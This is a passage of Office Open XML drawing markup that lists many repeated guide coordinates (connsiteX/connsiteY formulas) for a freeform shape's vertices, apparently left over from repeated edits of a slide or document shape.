              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 210596 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 8018744 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354943 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 8018744 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354943 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354943 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179933 h 2204007"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166836 h 2204007"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2091775 h 2204007"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051896 h 2204007"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2042034 h 2204007"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1995536 h 2204007"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1944748 h 2204007"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1794705 h 2204007"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672878 h 2204007"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1610325 h 2204007"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1563229 h 2204007"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1504249 h 2204007"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1422130 h 2204007"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357875 h 2204007"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301945 h 2204007"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237926 h 2204007"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 654437 h 2204007"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 355731 h 2204007"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 156104 h 2204007"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127810 h 2204007"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 58582 h 2204007"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179933 h 2204007"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166836 h 2204007"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2091775 h 2204007"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051896 h 2204007"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2042034 h 2204007"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1995536 h 2204007"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1944748 h 2204007"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1794705 h 2204007"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672878 h 2204007"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1610325 h 2204007"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1563229 h 2204007"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1504249 h 2204007"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1422130 h 2204007"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357875 h 2204007"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301945 h 2204007"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237926 h 2204007"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 654437 h 2204007"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 355731 h 2204007"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 156104 h 2204007"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127810 h 2204007"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 58582 h 2204007"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179933 h 2204007"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166836 h 2204007"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2091775 h 2204007"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051896 h 2204007"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2042034 h 2204007"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1995536 h 2204007"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
